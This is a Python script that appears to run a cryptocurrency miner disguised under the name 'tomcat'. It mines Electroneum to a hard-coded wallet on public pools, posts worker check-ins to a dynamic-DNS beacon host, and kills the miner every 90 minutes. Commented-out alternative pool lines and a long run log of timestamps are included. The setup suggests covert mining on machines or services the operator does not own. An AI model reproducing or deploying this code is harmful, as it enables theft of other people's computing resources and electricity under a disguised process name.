import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:06.749450
#2018-02-17 17:05:06.889128
#2018-02-17 18:53:07.344223
#2018-02-17 20:38:01.625135
#2018-02-17 22:24:04.466494
#2018-02-18 00:07:07.395593
#2018-02-18 01:58:07.597413
#2018-02-18 03:47:03.734947
#2018-02-18 05:33:06.442334
#2018-02-18 07:26:01.740767
#2018-02-18 09:13:05.969699
#2018-02-18 10:59:03.779598
#2018-02-18 12:46:04.243951
#2018-02-18 14:34:03.929873
#2018-02-18 16:24:04.626743
#2018-02-18 18:13:04.100441
#2018-02-18 19:58:07.003382
#2018-02-18 21:44:07.128159
#2018-02-18 23:33:04.758405
#2018-02-19 01:19:05.515630
#2018-02-19 03:07:06.679800
#2018-02-19 04:52:07.548270
#2018-02-19 06:37:03.870980
#2018-02-19 08:27:01.940020
#2018-02-19 10:16:05.543370
#2018-02-19 12:03:05.013257
#2018-02-19 13:49:01.627560
#2018-02-19 15:37:01.333828
#2018-02-19 17:22:05.831708
#2018-02-19 19:10:04.157868
#2018-02-19 20:54:04.942486
#2018-02-19 22:42:07.389828
#2018-02-20 00:27:03.363311
#2018-02-20 02:14:07.947750
#2018-02-20 04:05:05.748973
#2018-02-20 05:48:06.291850
#2018-02-20 07:33:05.797021
#2018-02-20 09:18:04.685669
#2018-02-20 11:02:06.251245
#2018-02-20 12:49:04.577938
#2018-02-20 14:33:07.081677
#2018-02-20 16:16:09.969836
#2018-02-20 18:03:03.256844
#2018-02-20 19:53:01.511850
#2018-02-20 21:42:07.302668
#2018-02-20 23:24:04.371630
#2018-02-21 01:08:07.043914
#2018-02-21 02:55:07.754284
#2018-02-21 04:44:08.298347
#2018-02-21 06:31:01.304390
#2018-02-21 08:16:06.704894
#2018-02-21 10:02:04.232519
#2018-02-21 11:49:12.289015
#2018-02-21 13:39:08.102455
#2018-02-21 15:23:07.577125
#2018-02-21 17:13:05.771932
#2018-02-21 19:00:12.344542
#2018-02-21 20:45:10.163086
#2018-02-21 22:29:07.699244
#2018-02-22 00:18:08.898082
#2018-02-22 02:07:03.945684
#2018-02-22 03:52:06.944444
#2018-02-22 05:38:05.820352
#2018-02-22 07:23:05.610723
#2018-02-22 09:10:09.965206
#2018-02-22 10:58:04.558462
#2018-02-22 12:45:03.701241
#2018-02-22 14:30:05.170353
#2018-02-22 16:16:01.365082
#2018-02-22 18:02:05.106119
#2018-02-22 19:52:07.745086
#2018-02-22 21:42:01.776183
#2018-02-22 23:29:01.423400
#2018-02-23 01:17:04.060432
#2018-02-23 03:05:05.144878
#2018-02-23 04:53:05.858407
#2018-02-23 06:39:05.230023
#2018-02-23 08:27:07.504650
#2018-02-23 10:43:09.774741
#2018-02-23 12:40:05.821460
#2018-02-23 14:23:05.764757
#2018-02-23 16:14:06.843789
#2018-02-23 18:01:04.360782
#2018-02-23 19:46:02.232788
#2018-02-23 21:28:08.589763
#2018-02-23 23:17:04.114723
#2018-02-24 01:08:01.829127
#2018-02-24 02:59:07.325090
#2018-02-24 03:00:55.452052
#2018-02-24 04:47:05.139652
#2018-02-24 06:18:03.746138
#2018-02-24 07:55:02.600095
#2018-02-24 09:25:08.097341
#2018-02-24 11:05:01.337033
#2018-02-24 12:39:06.057930
#2018-02-24 14:18:01.475640
#2018-02-24 15:50:01.704607
#2018-02-24 17:27:03.475004
#2018-02-24 19:29:07.288212
#2018-02-24 19:31:01.434462
#2018-02-24 21:06:07.696490
#2018-02-24 23:09:01.584408
#2018-02-25 01:31:03.780175
#2018-02-25 05:09:06.760330
#2018-02-25 10:32:01.606799